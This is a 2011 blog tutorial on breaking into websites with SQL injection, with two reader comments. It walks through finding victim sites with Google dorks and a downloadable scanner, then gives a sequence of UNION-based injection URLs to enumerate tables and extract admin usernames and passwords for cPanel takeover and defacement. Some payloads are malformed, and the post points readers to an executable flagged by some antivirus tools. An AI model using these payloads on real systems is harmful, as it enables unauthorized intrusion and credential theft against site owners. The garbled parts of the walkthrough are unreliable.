Infolink

Friday, February 4, 2011

How to Hack Websites using SQL Injection? A DETAILED TUTORIAL.

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)

What will I need to perform an SQL Injection attack?

[+] exploit scanner
[+] a good list of "google dorks"
[+] admin finder
[+] half a brain and the will to learn lol Tongue

I have provided all but 2 (in a .rar package available for download below) of the stated things above that you need. Also provided is a virus scan of the .rar for the skeptics lol

CLICK HERE TO DOWNLOAD THE TOOLS

Yes I know its 2/41. Its the exploit scanner. Its dectected as a Exploits/Riskware scanner. I myself use this same tool and no I'm not infected.
Code:
Antivirus      Version      Last Update      Result
a-squared    4.5.0.50    2010.01.18    -
AhnLab-V3    5.0.0.2    2010.01.18    -
AntiVir    7.9.1.142    2010.01.18    SPR/Tool.ExpScan
Antiy-AVL    2.0.3.7    2010.01.18    -
Authentium    5.2.0.5    2010.01.18    -
Avast    4.8.1351.0    2010.01.18    -
AVG    9.0.0.730    2010.01.18    -
BitDefender    7.2    2010.01.18    -
CAT-QuickHeal    10.00    2010.01.18    -
ClamAV    0.94.1    2010.01.18    -
Comodo    3625    2010.01.18    -
DrWeb    5.0.1.12222    2010.01.18    -
eSafe    7.0.17.0    2010.01.17    -
eTrust-Vet    35.2.7243    2010.01.18    -
F-Prot    4.5.1.85    2010.01.17    -
F-Secure    9.0.15370.0    2010.01.18    -
Fortinet    4.0.14.0    2010.01.18    -
GData    19    2010.01.18    -
Ikarus    T3.1.1.80.0    2010.01.18    -
Jiangmin    13.0.900    2010.01.18    -
K7AntiVirus    7.10.949    2010.01.16    -
Kaspersky    7.0.0.125    2010.01.18    -
McAfee    5864    2010.01.17    -
McAfee+Artemis    5864    2010.01.17    -
McAfee-GW-Edition    6.8.5    2010.01.18    Riskware.Tool.ExpScan
Microsoft    1.5302    2010.01.18    -
NOD32    4783    2010.01.18    -
Norman    6.04.03    2010.01.18    -
nProtect    2009.1.8.0    2010.01.18    -
Panda    10.0.2.2    2010.01.17    -
PCTools    7.0.3.5    2010.01.18    -
Prevx    3.0    2010.01.18    -
Rising    22.31.00.04    2010.01.18    -
Sophos    4.49.0    2010.01.18    -
Sunbelt    3.2.1858.2    2010.01.17    -
Symantec    20091.2.0.41    2010.01.18    -
TheHacker    6.5.0.6.154    2010.01.18    -
TrendMicro    9.120.0.1004    2010.01.18    -
VBA32    3.12.12.1    2010.01.17    -
ViRobot    2010.1.18.2142    2010.01.18    -
VirusBuster    5.0.21.0    2010.01.18    -

Ok after you are done downloading the tools. Open the .rar located on your desktop. Now open the .txt called "dorks'. From this list you can pick any dork you feel like scanning with. For good search results search for a dork like this.
Code:
index.php?id=

After you have chose a dork like above, copy it into your clipboard for further use. Now open your exploit scanner.exe. (scanner made by reiluke). At the top where it says "Dork" your going to want to paste your dork into the box.

Atfer you have done this your going to want to switch your "Max Url" from 100 to 1000 for alot of search results. Then press scan on your exploit scanner. After it is done scanning your going to press "Test Sites". After all this is done you should have two lists.


After it is done testing all scanned sites. These pre-tested sites might be sqli vulnerable. But you must first check each site individually. To test a individual site add a " ' " after the url. For example.
Code:
sqlivulnerablesite.com/index.php?id=1'

*NOTE* With this exploit scanner it auto-quotes all the urls.

Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--

Load the page. If the page loads correctly with that code injection in the url then we are on the right track

Knowing that there is already 1 column in this database we do another code injection. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--

If the page loads correctly again then this attack can still be performed.

Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10.

*NOTE* If you load the web page on a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--

and you get a result like this.
Code:
Unknown column '10' in 'order clause'

Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--

If your page loads correctly then this means there is 9 columns in the database

The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--

After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9

When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--

*NOTE* Here (x) is the ascii value of the table name.

Now we must find the ascii value of the word admins.

GO HERE TO CONVERT TEXT TO ASCII

The ascii value of admins is
Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;

Delete all the ";" , "#" , and "&". So it should look like this.
Code:
97,100,109,105,110,115

Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--

When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --

*NOTE* (0x3a) is the ascii value of the column name

When the page loads it should show the data of the username and password for cpanel access.

Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise.

Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!

Tutorial By KraZi

2 comments:

  1. Nice tutorial, can u give any example sites that we can apply on them

    ReplyDelete
  2. and also kindlly give a download link, as the given links are dead

    ReplyDelete